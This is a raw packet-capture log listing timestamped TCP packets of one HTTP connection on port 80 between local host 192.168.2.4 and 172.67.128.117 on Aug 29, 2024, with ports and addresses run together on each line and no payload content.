                                  Aug 29, 2024 23:42:07.126127958 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126137018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126164913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126220942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126220942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126220942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126220942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126225948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126240015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126251936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126264095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126266003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126272917 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126281977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126298904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126329899 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126372099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126384020 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126420975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126533985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126545906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126555920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126569033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126580954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126584053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126594067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126604080 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126606941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126626015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126636982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126637936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126662016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126665115 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126678944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126712084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126715899 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126732111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126743078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126760006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126769066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126802921 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126830101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126879930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126892090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126903057 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126915932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126928091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126929998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.126960993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.126982927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127127886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127140045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127152920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127165079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127177954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127177954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127191067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127201080 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127203941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127214909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127230883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127235889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127243996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127255917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127260923 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127269030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127290964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127317905 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127341986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127352953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127365112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127386093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127399921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127408981 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127413034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127451897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127593994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127604961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127615929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127628088 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127640009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127643108 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127652884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127666950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127671957 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127680063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127691031 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127693892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127726078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127731085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127743006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127753973 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127754927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127789021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127814054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127918959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127932072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127942085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127955914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127968073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127979040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.127980947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.127993107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128004074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128014088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128015995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128030062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128041029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128046989 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128053904 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128066063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128072023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128093004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128117085 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128223896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128236055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128247023 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128257990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128269911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128277063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128318071 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128386021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128398895 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128408909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128417969 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128432035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128438950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128446102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128459930 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128459930 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128473997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128503084 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128525019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128536940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128540039 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128571987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128587961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128691912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128705025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128714085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128727913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128740072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128740072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128752947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128766060 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128777981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128789902 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128799915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128803968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128810883 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.128822088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128855944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.128879070 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.129072905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129085064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129096031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129106998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129118919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129127979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.129132032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129144907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129158020 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129173994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129174948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.129187107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129194975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.129206896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.129219055 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.129239082 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.129272938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214498997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214512110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214524984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214564085 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214601040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214608908 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214613914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214626074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214637041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214651108 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214654922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214669943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214699984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214735985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214747906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214761019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214777946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214783907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214791059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214806080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214811087 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214819908 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214837074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214848042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.214857101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.214893103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215024948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215035915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215045929 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215058088 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215070009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215078115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215090036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215101004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215102911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215116978 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215122938 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215131044 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215153933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215156078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215183973 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215210915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215286970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215298891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215310097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215326071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215328932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215338945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215352058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215353966 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215367079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215379000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215385914 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215404034 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215430021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215537071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215548992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215559959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215572119 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215584993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215590954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215598106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215610981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215620041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215639114 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215653896 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215679884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215692043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215703011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215715885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215728045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215735912 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215743065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215759993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215763092 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215786934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215805054 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.215981960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215992928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.215997934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216007948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216018915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216032982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216034889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216044903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216058016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216065884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216078043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216078043 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216090918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216115952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216141939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216253996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216264963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216278076 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216290951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216301918 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216308117 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216314077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216315985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216331005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216344118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216355085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216356993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216366053 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216378927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216381073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216406107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216424942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216576099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216593981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216604948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216617107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216628075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216629028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216641903 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216654062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216660976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216669083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216670990 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216712952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216727018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216737032 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216738939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216752052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216770887 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216783047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216804028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216810942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216823101 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216835976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216845989 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216850996 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216869116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216886997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216943979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216957092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216967106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216979980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.216989994 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.216990948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217009068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217019081 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217026949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217035055 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217062950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217066050 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217103958 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217221975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217233896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217243910 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217256069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217267990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217276096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217278957 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217292070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217300892 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217304945 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217318058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217319965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217330933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217343092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217355967 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217387915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:07.217524052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217535019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217551947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217565060 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217576027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:07.217577934 CEST4973080192.168.2.4172.67.128.117
